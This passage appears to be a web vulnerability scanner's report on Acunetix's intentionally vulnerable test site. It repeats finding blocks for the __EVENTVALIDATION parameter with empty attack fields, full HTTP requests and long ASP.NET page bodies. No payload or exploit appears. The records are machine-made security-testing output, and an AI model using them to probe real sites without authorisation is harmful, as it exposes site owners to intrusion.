href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8413&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAALx359NoIZGRkZnVYSkxhHd6OhqcQDx5zL01rsu4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLi%2B5WxCwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXbozSoPiQqb2q5ov1KNLg4t4Fflg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:34 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAALx359NoIZGRkZnVYSkxhHd6OhqcQDx5zL01rsu4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLi+5WxCwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXbozSoPiQqb2q5ov1KNLg4t4Fflg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:White" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,111 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8472&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAjuNVI9sIZGRkkjD8pptN4VQPqbCjCKL48Tg6pWk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLi7M3yCQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJtek%2BwBGsGjIC%2FLTVK9jZ5OYkOck%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:58 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBAjuNVI9sIZGRkkjD8pptN4VQPqbCjCKL48Tg6pWk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLi7M3yCQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJtek+wBGsGjIC/LTVK9jZ5OYkOck=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:White" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 